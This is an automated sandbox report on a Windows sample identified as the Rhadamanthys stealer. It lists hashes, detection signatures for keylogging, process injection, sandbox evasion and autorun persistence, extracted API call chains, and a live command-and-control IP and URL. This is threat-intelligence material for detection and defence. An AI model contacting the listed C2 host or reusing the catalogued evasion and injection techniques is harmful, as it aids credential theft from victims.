Windows Analysis Report
ngPebbPhbp.exe

Overview

General Information

Sample name: ngPebbPhbp.exe
renamed because original name is a hash value
Original sample name: 5f58e87fee021cbaa9ecfae2d5f8709bd0934b2d2d2779a8f24993425fb20350.exe
Analysis ID: 1560167
MD5: fa000351e26e17543f67e3dedc97d37e
SHA1: c59fc4f489ac15d5a1d455abbf0c3c5ad6fcc189
SHA256: 5f58e87fee021cbaa9ecfae2d5f8709bd0934b2d2d2779a8f24993425fb20350
Tags: 77-105-161-194, exe, user-JAMESWT_MHT

Detection

RHADAMANTHYS
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM autoit script
Yara detected AntiVM3
Yara detected Autoit Injector
Yara detected RHADAMANTHYS Stealer
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Found API chain indicative of sandbox detection
Injects a PE file into a foreign process
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses ipconfig to lookup or modify the Windows network settings
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connections (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shut down / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number, etc.) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file name differs from the original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Use NTFS Short Name in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

Name: Rhadamanthys
Description: According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies, it is designed to extract data from infected machines. At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
Attribution: Sandworm
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

AV Detection

Source: ngPebbPhbp.exe ReversingLabs: Detection: 55%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 98.3% probability
Source: ngPebbPhbp.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ngPebbPhbp.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: ngPebbPhbp.exe, 00000000.00000000.1695435766.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp, ngPebbPhbp.exe, 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: wkernel32.pdb source: OpenWith.exe, 0000000F.00000003.1934628698.00000000058C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934512366.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: OpenWith.exe, 0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934921441.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: OpenWith.exe, 0000000F.00000003.1933709794.0000000005990000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1933480930.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb, source: qwlvpmrupf.mp3, 00000007.00000003.1924745407.000000000113D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000000.1924462508.00000000005C2000.00000002.00000001.01000000.0000000C.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2054601563.000000000182C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2185950312.0000000001A71000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2271006709.0000000001493000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: OpenWith.exe, 0000000F.00000003.1934031698.00000000057A0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934260975.0000000005940000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: OpenWith.exe, 0000000F.00000003.1933709794.0000000005990000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1933480930.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: OpenWith.exe, 0000000F.00000003.1934031698.00000000057A0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934260975.0000000005940000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb source: qwlvpmrupf.mp3, 00000007.00000003.1924745407.000000000113D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000000.1924462508.00000000005C2000.00000002.00000001.01000000.0000000C.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2054601563.000000000182C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2185950312.0000000001A71000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2271006709.0000000001493000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdbUGP source: OpenWith.exe, 0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934921441.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbUGP source: OpenWith.exe, 0000000F.00000003.1934628698.00000000058C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934512366.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B0F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_00B0F826
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B21630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW, 0_2_00B21630
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003DE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 7_2_003DE387
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003DD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 7_2_003DD836
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003DDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 7_2_003DDB69
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003E9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 7_2_003E9F9F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003EA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 7_2_003EA0FA
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003EA488 FindFirstFileW,Sleep,FindNextFileW,FindClose, 7_2_003EA488
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003E65F1 FindFirstFileW,FindNextFileW,FindClose, 7_2_003E65F1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003E7248 FindFirstFileW,FindClose, 7_2_003E7248
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003E72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 7_2_003E72E9
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DFE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 16_2_00DFE387
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DFD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 16_2_00DFD836
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DFDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 16_2_00DFDB69
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E09F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 16_2_00E09F9F
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E0A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 16_2_00E0A0FA
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E0A488 FindFirstFileW,Sleep,FindNextFileW,FindClose, 16_2_00E0A488
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E065F1 FindFirstFileW,FindNextFileW,FindClose, 16_2_00E065F1
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E072E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 16_2_00E072E9
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E07248 FindFirstFileW,FindClose, 16_2_00E07248
Source: global traffic TCP traffic: 192.168.2.4:49736 -> 51.75.171.9:5151
Source: unknown TCP traffic detected without corresponding DNS query: 51.75.171.9
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003ED7A1 InternetReadFile,SetEvent,GetLastError,SetEvent, 7_2_003ED7A1
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2078930988.0000000000E65000.00000002.00000001.01000000.0000000E.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000002.2216834063.0000000000E65000.00000002.00000001.01000000.0000000E.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000000.2185326660.0000000000E65000.00000002.00000001.01000000.0000000E.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: OpenWith.exe, 0000000F.00000002.2944848789.000000000327C000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://51.75.171.9:5151/9640d96bbead45f349f3ab9/nvkjh5gq.0x2e8
Source: OpenWith.exe, 0000000F.00000002.2944848789.000000000327C000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://51.75.171.9:5151/9640d96bbead45f349f3ab9/nvkjh5gq.0x2e8(
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repository/0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003EF45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 7_2_003EF45C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003EF6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 7_2_003EF6C7
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E0F6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 16_2_00E0F6C7
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003DA54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 7_2_003DA54A
Source: OpenWith.exe, 0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DirectInput8Create memstr_7d31fd25-6
Source: OpenWith.exe, 0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: GetRawInputData memstr_98c403a2-e
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00409ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 7_2_00409ED5
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E29ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 16_2_00E29ED5
Source: Yara match File source: 15.3.OpenWith.exe.59c0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.3.OpenWith.exe.57a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.1934921441.00000000057A0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: OpenWith.exe PID: 7980, type: MEMORYSTR

System Summary

Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_066CA41B GetCurrentProcess,NtQueryInformationProcess, 17_2_066CA41B
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_066C7895 NtQueryInformationProcess, 17_2_066C7895
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B09B5C: _wcslen,CreateFileW,CloseHandle,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW, 0_2_00B09B5C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003D1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 7_2_003D1A91
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003DF122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 7_2_003DF122
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DFF122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 16_2_00DFF122
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B1355D 0_2_00B1355D
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B1B76F 0_2_00B1B76F
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B0BF3D 0_2_00B0BF3D
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B2C0D6 0_2_00B2C0D6
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B1A008 0_2_00B1A008
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B292D0 0_2_00B292D0
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B1A222 0_2_00B1A222
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B15214 0_2_00B15214
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B1C27F 0_2_00B1C27F
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B34360 0_2_00B34360
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B386D2 0_2_00B386D2
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B146CF 0_2_00B146CF
